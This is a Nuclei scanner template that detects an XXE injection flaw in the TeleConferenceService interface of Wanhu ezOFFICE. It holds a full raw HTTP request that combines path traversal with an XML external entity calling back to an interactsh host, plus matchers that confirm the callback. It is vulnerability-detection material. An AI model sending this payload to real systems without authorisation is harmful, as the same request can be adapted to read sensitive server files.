id: wanhu-ezoffice-teleconferenceservice-xxe

info:
  name: 万户ezoffice TeleConferenceService XXE注入漏洞
  author: pphua
  severity: medium   
  description: 万户ezoffice TeleConferenceService接口存在XXE注入漏洞，攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
  reference: 
  tags: wanhu,xxe,ezoffice,oa

http:
  - raw:
      - |
        POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0" encoding="UTF-8" ?>
        <!DOCTYPE ANY [
        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>        
        <value>&xxe;</value>
   
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 404
          
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "http"
          - "dns"